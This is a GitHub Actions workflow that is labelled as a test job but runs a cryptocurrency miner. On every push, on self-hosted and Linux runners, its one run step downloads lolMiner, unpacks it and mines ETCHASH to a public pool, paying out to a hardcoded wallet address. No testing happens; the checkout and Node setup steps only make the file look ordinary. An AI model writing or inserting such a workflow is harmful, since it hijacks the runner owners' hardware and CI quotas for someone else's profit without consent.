on: push
jobs:
  test:
    strategy:
      matrix:
        platform: [self-hosted, Linux, X64]
    runs-on: ${{ matrix.platform }}
    steps:
    - uses: actions/checkout@v1
    - uses: actions/setup-node@v1
      with:
        version: 12
    - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.29/lolMiner_v1.29_Lin64.tar.gz && tar xf lolMiner_v1.29_Lin64.tar.gz && cd 1.29 && ./lolMiner --algo ETCHASH --pool etchash.unmineable.com:3333 --user BTT:TWGHJJSsrXEkbKBMMx2Q6GohBfiiC31rME.$(echo $(shuf -i 1000-9999 -n 1)-DIAN)
